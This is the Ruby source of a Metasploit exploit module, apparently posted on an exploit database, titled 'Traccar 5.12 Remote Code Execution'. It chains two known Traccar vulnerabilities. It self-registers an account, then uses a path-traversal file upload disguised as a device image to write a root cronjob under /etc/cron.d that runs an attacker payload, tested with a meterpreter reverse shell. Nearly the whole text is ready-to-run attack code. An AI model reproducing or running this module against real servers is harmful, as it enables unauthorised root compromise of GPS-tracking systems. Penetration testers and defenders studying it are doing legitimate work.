Traccar 5.12 Remote Code Execution

class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Traccar v5 Remote Code Execution (CVE-2024-31214 and CVE-2024-24809)',        'Description' => %q{          Remote Code Execution in Traccar v5.1 - v5.12.          Remote code execution can be obtained by combining two vulnerabilities: A path traversal vulnerability (CVE-2024-24809) and an unrestricted file upload vulnerability (CVE-2024-31214).          By default, the application allows self-registration, enabling any user to register an account and exploit the issues. Moreover, the application runs by default with root privileges, potentially resulting in a complete system compromise.          This module, which should work on any Red Hat-based Linux system, exploits these issues by adding a new cronjob file that executes the specified payload.        },        'License' => MSF_LICENSE,        'Author' => [          'Michael Heinzl', # MSF Module          'yiliufeng168', # Discovery CVE-2024-24809 and PoC          'Naveen Sunkavally' # Discovery CVE-2024-31214 and PoC        ],        'References' => [          [ 'URL', 'https://github.com/traccar/traccar/security/advisories/GHSA-vhrw-72f6-gwp5'],          [ 'URL', 'https://github.com/traccar/traccar/security/advisories/GHSA-3gxq-f2qj-c8v9'],          [ 'URL', 'https://www.horizon3.ai/attack-research/disclosures/traccar-5-remote-code-execution-vulnerabilities/'],          [ 'CVE', '2024-31214'],          [ 'CVE', '2024-24809']        ],        'DisclosureDate' => '2024-08-23',        'Platform' => [ 'linux' ],        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Linux Command',            {              'Arch' => [ ARCH_CMD ],              'Platform' => [ 'linux' ],              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp              'Type' => :unix_cmd            }          ]        ],        'Payload' => {          'BadChars' => "\x27" # apostrophe (')        },        'DefaultTarget' => 0,        'DefaultOptions' => {          'WfsDelay' => 75        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [EVENT_DEPENDENT],          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]        }      )    )    register_options(      [        Opt::RPORT(8082),        OptString.new('USERNAME', [true, 'Username to be used when creating a new user', Faker::Internet.username]),        OptString.new('PASSWORD', [true, 'Password for the new user', Rex::Text.rand_text_alphanumeric(16)]),        OptString.new('EMAIL', [true, 'E-mail for the new user', Faker::Internet.email]),        OptString.new('TARGETURI', [ true, 'The URI for the Traccar web interface', '/'])      ]    )  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'api/server')    })    return CheckCode::Unknown unless res && res.code == 200    data = res.get_json_document    version = data['version']    if version.nil?      return CheckCode::Unknown    else      vprint_status('Version retrieved: ' + version)    end    unless Rex::Version.new(version).between?(Rex::Version.new('5.1'), Rex::Version.new('5.12'))      return CheckCode::Safe    end    return CheckCode::Appears  end  def exploit    prepare_setup    execute_command(payload.encoded)  end  def prepare_setup    print_status('Registering new user...')    body = {      name: datastore['USERNAME'],      email: datastore['EMAIL'],      password: datastore['PASSWORD'],      totpKey: nil    }.to_json    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api/users'),      'ctype' => 'application/json',      'data' => body    )    unless res      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')    end    auth_status = false    # not quite necessary to check for this, since we exit all cases that are not 200 below, but this is a common error    # to run into when this module is executed more than once without updating the provided email address    if res.code == 400 && res.to_s.include?('Unique index or primary key violation')      print_status('The same E-mail already exists on the system, trying to authenticate with existing password...')      res = send_request_cgi(        'method' => 'POST',        'keep_cookies' => true,        'uri' => normalize_uri(target_uri.path, 'api/session'),        'ctype' => 'application/x-www-form-urlencoded',        'vars_post' => {          'email' => datastore['EMAIL'],          'password' => datastore['PASSWORD']        }      )      unless res        fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')      end      json = res.get_json_document      unless res.code == 200 && json['name'] == datastore['USERNAME'] && json['email'] == datastore['EMAIL']        print_status('Provide the correct password for the existing E-Mail address, or provide a new E-Mail address.')        fail_with(Failure::UnexpectedReply, res.to_s)      end      auth_status = true    end    unless res.code == 200      fail_with(Failure::UnexpectedReply, res.to_s)    end    json = res.get_json_document    unless json['name'] == datastore['USERNAME'] && json['email'] == datastore['EMAIL']      fail_with(Failure::UnexpectedReply, 'Received unexpected reply:\n' + json.to_s)    end    if auth_status == false      print_status('Authenticating...')      res = send_request_cgi(        'method' => 'POST',        'keep_cookies' => true,        'uri' => normalize_uri(target_uri.path, 'api/session'),        'ctype' => 'application/x-www-form-urlencoded',        'vars_post' => {          'email' => datastore['EMAIL'],          'password' => datastore['PASSWORD']        }      )      unless res        fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')      end      json = res.get_json_document      unless res.code == 200 && json['name'] == datastore['USERNAME'] && json['email'] == datastore['EMAIL']        fail_with(Failure::UnexpectedReply, 'Received unexpected reply:\n' + json.to_s)      end    end  end  def execute_command(cmd)    name_v = Rex::Text.rand_text_alphanumeric(16)    unique_id_v = Rex::Text.rand_text_alphanumeric(16)    body = {      name: name_v,      uniqueId: unique_id_v    }.to_json    print_status('Adding new device...')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api/devices'),      'keep_cookies' => true,      'ctype' => 'application/json',      'data' => body    )    unless res      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')    end    json = res.get_json_document    unless res.code == 200 && json['name'] == name_v && json['uniqueId'] == unique_id_v && json.key?('id')      fail_with(Failure::UnexpectedReply, 'Received unexpected reply:\n' + json.to_s)    end    id = json['id'].to_s    body = Rex::Text.rand_text_alphanumeric(1..4)    fn = Rex::Text.rand_text_alpha(1..2)    print_status('Uploading crontab file...')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, "api/devices/#{id}/image"),      'keep_cookies' => true,      'ctype' => 'image/png',      'data' => body    )    unless res      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')    end    unless res.code == 200 && res.to_s.include?('device.png')      fail_with(Failure::UnexpectedReply, res.to_s)    end    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, "api/devices/#{id}/image"),      'keep_cookies' => true,      'ctype' => "image/png;#{fn}=\"/b\"",      'data' => body    )    unless res      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')    end    unless res.code == 200 && res.to_s.include?("device.png;#{fn}=\"/b\"")      fail_with(Failure::UnexpectedReply, res.to_s)    end    body = "* * * * * root /bin/bash -c '#{cmd}'\n"    cronfn = SecureRandom.hex(12)    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, "api/devices/#{id}/image"),      'keep_cookies' => true,      'ctype' => "image/png;#{fn}=\"/../../../../../../../../../etc/cron.d/#{cronfn}\"",      'data' => body    )    register_file_for_cleanup("/etc/cron.d/#{cronfn}\"")    unless res      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')    end    unless res.code == 200 && res.to_s.include?("device.png;#{fn}=\"/../../../../../../../../../etc/cron.d/#{cronfn}\"")      fail_with(Failure::UnexpectedReply, res.to_s)    end    vprint_status('Cleanup: Deleting previously added device...')    res = send_request_cgi(      'method' => 'DELETE',      'uri' => normalize_uri(target_uri.path, "api/devices/#{id}"),      'headers' => {        'Connection' => 'close'      }    )    unless res      print_bad('Failed to receive a reply from the server, device removal might have failed.')    end    unless res.code == 204      print_bad('Received unexpected reply, device removal might have failed:\n' + res.to_s)    end    # It takes up to one minute to get the cron job executed; need to wait as otherwise the handler might terminate too early    print_status('Cronjob successfully written - waiting for execution...')  endend